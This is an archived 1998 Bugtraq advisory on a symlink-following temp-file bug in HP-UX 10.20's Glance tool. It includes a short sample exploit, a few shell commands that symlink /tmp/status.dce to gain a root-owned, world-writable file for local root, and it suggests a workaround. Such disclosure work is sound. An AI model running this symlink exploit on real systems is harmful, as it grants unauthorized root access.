Yet ANOTHER hole in the HP/UX Glance program
| Description: | Standard symlink-following TMPFILE stupidity | 
| Author: | "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES> | 
| Compromise: | root  (local) | 
| Vulnerable Systems: | HP/UX 10.20, perhaps other versions. | 
| Date: | 27 April 1998 | 
Date: Mon, 27 Apr 1998 23:31:12 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: HP-UX glance bug (#4?)
    * Software:
    HP-UX B.10.20 D
    Glance.Runtime.GLANCE                 B.10.20.95     HP GlancePlus files
    * Bug:
    glance creates a /tmp/status.dce file as root, and it follows
    symlinks, so you can append text like
Pid: 16208  File: ndi_sm.c         Line:   2609   Mon Apr 27 21:52:23 1998
Performance Management Application registered.
--------------------------------------------------------------------------
    to any system file.
    * Sample exploit:
    $ umask 000
        $ cd /tmp
    $ ln -s /.test status.dce
    $ glance -j 1 -iterations 1 -maxpages 1
    $ ls -l /.test
    -rw-rw-rw-   1 root       bar           1080 Apr 27 23:06 /.test
    # edit /.test to match your needs
        * Workaround:
        I guess creating a non writable /tmp/status.dce file
        and setting the t bit on /tmp (which it seems it has
        not in the default HPUX installation) would be enough
    * Note: I've been looking for HP-UX bugs, and I have found
    several reported holes in glance; but it seems this one
    is new...
--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of  Fyodor's exploit
world.  
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap.  Or try these Insecure.Org resources: